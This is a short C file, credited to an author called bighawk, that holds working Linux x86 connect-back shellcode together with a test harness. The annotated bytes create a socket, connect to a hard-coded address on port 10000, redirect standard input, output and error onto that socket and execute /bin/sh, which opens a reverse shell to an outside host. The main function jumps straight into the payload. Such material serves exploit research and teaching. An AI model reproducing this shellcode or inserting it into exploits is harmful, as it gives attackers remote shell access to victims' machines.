/* 70 bytes connect-back shellcode - linux-x86 - linux-2.4
 * 71 bytes connect-back shellcode - linux-x86 - linux-2.2
 * - by bighawk (bighawk@kryptology.org)
 *
 * This shellcode connects back to you on port 10000 (default)
 *
 */

#define IPADDR          "\x31\x03\x03\x07"
#define PORT            "\x27\x10"

char code[] =

   "\x31\xdb"			// xor	  ebx, ebx
   "\x6a\x66"			// push	  byte 102
   "\x58"			// pop	  eax
   "\x53"			// push	  ebx
   "\x43"			// inc	  ebx
   "\x53"			// push	  ebx
   "\x6a\x02"			// push	  byte 2
   "\x89\xe1"			// mov	  ecx, esp
   "\xcd\x80"			// int	  80h
   "\x68"IPADDR			// push	  dword IPADDR
   "\x66\x68"PORT		// push	  word PORT
   "\x43"			// inc	  ebx
   "\x66\x53"			// push	  bx
   "\x89\xe6"			// mov	  esi, esp
   "\x6a\x10"			// push	  byte 16
   "\x56"			// push	  esi
   "\x50"			// push	  eax
   "\x89\xe1"			// mov	  ecx, esp
   "\x43"			// inc	  ebx
   "\xb0\x66"			// mov	  al, 102
   "\xcd\x80"			// int	  80h
   "\x87\xcb"			// xchg	  ecx, ebx
   "\x5b"			// pop	  ebx
   "\xb0\x3f"			// mov    al, 63
   "\xcd\x80"			// int    80h
   "\x49"			// dec    ecx
   "\x79\xf9"			// jns    duploop
   "\x50"			// push	  eax
   "\x68\x6e\x2f\x73\x68"	// push	  dword 68732f6eh
   "\x68\x2f\x2f\x62\x69"	// push	  dword 69622f2fh
   "\x89\xe3"			// mov	  ebx, esp
   "\x50"			// push	  eax
   "\x53"			// push	  ebx
   "\x89\xe1"			// mov	  ecx, esp
   "\xb0\x0b"			// mov	  al, 11
#ifdef LINUX2_2
   "\x99"			// cdq
#endif
   "\xcd\x80";			// int	  80h


main() {
  void (*a)() = (void *)code;
  printf("size: %d bytes\n", strlen(code));
  a();
}